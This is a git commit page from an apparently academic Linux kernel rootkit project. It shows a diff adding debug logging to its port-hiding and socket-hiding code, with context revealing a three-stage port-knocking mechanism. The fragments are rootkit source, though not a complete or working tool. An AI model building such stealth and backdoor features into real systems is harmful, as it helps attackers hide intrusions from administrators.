linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 3743692d5eb1139baeae0dbebf0bfecf10b3dba8
parent 14d6efa8eca2edc073cbef338248f335e8061f42
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:38:21 +0100

adds debug info

Diffstat:

Msrc/porthide.c | 13++++++++++---


Msrc/sockhide.c | 1+


2 files changed, 11 insertions(+), 3 deletions(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -91,16 +91,22 @@ clear_hidden_lports(void)
     ip_t no_ip = { 0 };
 
     i = ips_stage1_tail;
-    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16)))
+    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
+        DEBUG_INFO("removing from stage1\n");
         while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+    }
 
     i = ips_stage2_tail;
-    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16)))
+    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
+        DEBUG_INFO("removing from stage2\n");
         while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+    }
 
     i = ips_stage3_tail;
-    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16)))
+    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
+        DEBUG_INFO("removing from stage3\n");
         while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
+    }
 
     lport_list_t_ptr j;
 
@@ -151,6 +157,7 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport)
     lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL;
 
     if (i && (i->lport != -1)) {
+        DEBUG_INFO("remove_lport_from_list: removing lport %d\n", lport);
         if (i->next)
             i->next->prev = i->prev;
         else
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -168,6 +168,7 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto_t proto)
     port_list_t_ptr i = find_port_in_list(list, port, proto), ret = NULL;
 
     if (i && (i->port != -1 && i->proto != -1)) {
+        DEBUG_INFO("remove_port_from_list: removing port %d\n", port);
         if (i->next)
             i->next->prev = i->prev;
         else